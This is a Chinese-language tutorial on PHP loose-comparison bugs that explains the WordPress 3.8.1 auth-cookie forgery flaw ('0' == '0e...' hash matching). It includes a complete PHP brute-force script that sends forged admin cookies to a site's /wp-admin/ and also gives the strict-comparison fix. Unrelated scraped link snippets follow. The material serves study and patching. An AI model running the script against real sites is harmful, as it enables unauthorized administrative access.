PHP弱类型:WordPress Cookie伪造
1 PHP弱类型
PHP是弱类型语言,所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 != 进行相等判断时,会自动进行类型转换,用 === 以及 !== 进行判断时不会自动转换类型。
<?php
$a = 3;
$b = '3vic';
var_dump($a == $b);//true
var_dump($a != $b);//false
var_dump($a === $b);//true
var_dump($a !== $b);//false
?>
说明:在PHP中字符串转换成整型时,如果是数字开头就会转换成前面的数字('3vic' -> 3),如果不是数字开头,那么就会转换成0('vic' -> 0)
2 WordPress代码
- WordPress 3.8.1 与 WordPress 3.8.2 部分代码区别
<?php
// WordPress 3.8.1
if ($hmac != $hash) {}
// WordPress 3.8.2
if ( hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key) ) {}
?>
- Cookie 组成
客户端后台只验证其中的一条Cookie,如下所示
wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin||cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly
其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91
格式为 wordpress_
+ md5(siteurl
) 其中siteurl
为WordPress的网址,此处网站地址为http://www.test.ichunqiu,
md5加密后为c47f4a97d0321c1980bb76fc00d1e78f
,其它部分也可省。
类型 用户名 过期时间 登录成功服务器端赋予客户端的hash值
对应变量 | $username | $expiration | $hmac |
cookies | admin | 1433403595 | cf50f3b50eed94dd0fdc3d3ea2c7bbb |
- 分析验证登录
代码 wp-includes/pluggable.php 第543-549行
<?php
$key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);
$hash = hash_hmac('md5', $username . '|' . $expiration, $key);
if ( $hmac != $hash ) {
do_action('auth_cookie_bad_hash', $cookie_elements);
return false;
}
在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有 $username 用户名,$expiration 有效期,又因为其中用户名是固定的,因此只有$expiration
是可控的,所以我们可以从改变 $expiration
的方法来改变$hash
。
- 结合PHP Hash 比较缺陷分析 WordPress
有以下几种可能使 $hmac == $hash
为真,字符串完全相等或者 $hmac
等于0的同时 $hash
为以字符开头的字符串; 将客户端的Cookie中 $hmac
值改为0,然后在if ( $hmac != $hash ) {
的上面一行写入var_dump($hmac);die();
发现打印出来 $hmac
的结果是 string '0'
而不是int 0
, 那么有没有方法使字符串识别为整数呢,代码如下:
<?php
var_dump('0' == '0e156464513131');//true
其中的 0e156464513131
会被识别为0乘以10的156464513131次方,还是得0;因此当 $hash
以0e开头后面全是数字时就会与 $hmac
的值为 '0' 时相等,所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0
然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 $hash
的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。
3 测试脚本
通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。
<?php
/* 本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
传入两个值
WordPress 的主页 $host
管理员用户名 $root
*/
header("Content-type:text/html;charset=utf-8"); $host = 'http://xxx.xxx.xxx';//主页地址 结尾不带'/'
$root = 'user';//管理员用户名 $url = $host.'/wp-admin/';//后台管理地址
$sitehash=md5($host); echo "\nWelcome\n\n";
//通过时间戳暴力破解cookie 实现伪造cookie
for($i=1500000000;$i<1600000000;$i++){
$cookie = "wordpress_".$sitehash."=".$root."|".$i."|0;";//组合构造cookie
$header = array(
"Content-Type:application/x-www-form-urlencoded",
'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
"Cookie:".$cookie,
); $curl = curl_init(); // 启动一个CURL会话
curl_setopt($curl, CURLOPT_URL, $url); // 要访问的地址
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); // 使用自动跳转
curl_setopt($curl, CURLOPT_AUTOREFERER, 1); // 自动设置Referer
curl_setopt($curl, CURLOPT_HTTPGET, true); // 发送一个常规的Post请求
curl_setopt($curl, CURLOPT_HTTPHEADER, $header); // 读取上面所储存的Cookie信息
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); // 获取的信息以文件流的形式返回
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);//让curl自动选择版本
$tmpInfo = curl_exec($curl); // 执行操作
if (curl_errno($curl)) {
echo 'Errno'.curl_error($curl);
}
curl_close($curl); // 关闭CURL会话 //匹配结果
if(strstr($tmpInfo,'我们准备了几个链接供您开始')){
echo "\n".'success : '.$cookie."\n\n";
break;
}else{
echo 'fail : '.$cookie."\n";
} }
?>
说明:理论上32位的MD5值以0e开头的大概三亿分之一,碰撞到可以利用的 $expiration 几率极低。
5 修复方案
PHP 中使用的哈希比较函数,将其中的 == , != 分别更改为 === 和 !== 或者 将比较的两个变量使用MD5再加密一次。
学习笔记:http://ichunqiu.com/course/167
PHP弱类型:WordPress Cookie伪造的更多相关文章
- PHP弱类型需要特别注意的问题
下面介绍的问题都已验证, 总结:字符数据比较==不比较类型,会将字符转数据,字符转数字(转换直到遇到一个非数字的字符.即使出现无法转换的字符串,intval()不会报错而是返回0).0e,0x开头的字 ...
- [JS2] JS是弱类型
<html> <head> <title>JavaScript 是弱类型的</title> <Script Language="Java ...
- sqlite 的比较等运算是根据不同的值而不同的,并不是根据的字段类型,因为 sqlite 是弱类型字段
sqlite 的比较等运算是根据不同的值而不同的,并不是根据的字段类型,因为 sqlite 是弱类型字段 --------------------------------------------- ...
- MVC强类型和弱类型的区别
1 强类型的处理 首先必须要有一个对象的实体类,UserINfo就是一个实体类,如下: public class UserInfo() { public int Id{set;get;} publi ...
- PHP弱类型安全问题的写法和步骤
鉴于目前PHP是世界上最好的语言,PHP本身的问题也可以算作是web安全的一个方面.在PHP中的特性就是弱类型,以及内置函数对于传入参数的松散处理.本篇文章主要就是记录我在做攻防平台上面遇到的PHP的 ...
- Javascript 弱类型:除法结果是小数
由于javascript是弱类型,只有一种var类型,所以在运算时不会自动强制转换,所以计算的结果是多少就是多少,但java中的17/10的结果就是1(强类型与弱类型)比如:console.log(M ...
- 2016年11月3日JS脚本简介数据类型: 1.整型:int 2.小数类型: float(单精度) double(双精度) decimal () 3.字符类型: chr 4.字符串类型:sting 5.日期时间:datetime 6.布尔型数据:bool 7.对象类型:object 8.二进制:binary 语言类型: 1.强类型语言:c++ c c# java 2.弱类型语
数据类型: 1.整型:int 2.小数类型: float(单精度) double(双精度) decimal () 3.字符类型: chr 4.字符串类型:sting 5.日期时间:datetime 6 ...
- 弱类型语言中的0和空字符串(''或"")以及字符串'0'
在弱类型语言(js/PHP)中, 当我们用==判断0和'0'以及空字符串(''或"")是否相等的时候, 返回的是true. 而且在PHP中, 当我们用==判断0和null是否相等的 ...
- PHP弱类型语法的实现
PHP弱类型语法的实现 前言 借鉴了 TIPI, 对 php 源码进行学习 欢迎大家给予意见, 互相沟通学习 弱类型语法实现方式 (弱变量容器 zval) 所有变量用同一结构表示, 既表示变量值, 也 ...
随机推荐
- 让ie支持placeholder属性,一段js搞定
placeholder属性真的是超级好用的新属性,可惜,只有新版浏览器才支持,为了写出输入框贴心提示,老方法就是加span标签覆盖,营造出placeholder提示的感觉,现在安利一款好用的js,好用 ...
- 20160125--Spring
package com.hanqi; import java.util.*; import com.hanqi.User; public class HelloWorld { public Hello ...
- C语言,如何产生随机数
1. 基本函数 在C语言中取随机数所需要的函数是: int rand(void);void srand (unsigned int n); rand()函数和srand()函数被声明在头文件stdli ...
- leetcode Trapping Rain Water pthon
class Solution(object): def trap(self,nums): leftmosthigh = [0 for i in range(len(nums))] leftmax=0 ...
- mysql函数操作
<?php try{ $dbh = new PDO('mysql:dbname=testdb;host=localhost', 'mysql_user', 'mysql_pwd'); }catc ...
- C语言学习 —— 字符串的学习(一)
这是本人在学习 C语言有关 字符串内容 时的相关笔记 由于本人技术有限,如有错误,还望指正 C语言中数据类型中只有 字符型(char),而 char型 变量一次只能存储一个字符,在日常工作中经常需要定 ...
- 项目中引用ThinkPHP框架
ThinkPHP是一个宽度.兼容且简单的国产的轻量级框架,具有优良的性能,并且非常注重易用性. 那么,我们该如何将ThinkPHP引入自己的项目中,使得自己的项目可以使用这款优良的框架呢? 首先介绍下 ...
- Qt窗口的标题栏自绘
因个人需要,要修改Qt Widget的标题栏,网上找了大半天,没有得到答案,但发现问的人比较多 所以现将找到的此文分享一下. (原文:http://www.qtsoftware.com/develop ...
- 一个好用的VC DBGRID[图]
本文示例源代码下载 CGridCtrl_demo19_01.zip为演示CGridCtrl的使用 CGridCtrl_demo19_02.zip演示与CMYODBC的配合使用 一.引言 在用vc开发关 ...
- C++赋值运算符、函数调用运算符、下标运算符(“=”、“()”、“[]”)重载
#include <iostream>#include <assert.h>#include <string.h> using namespace std; cla ...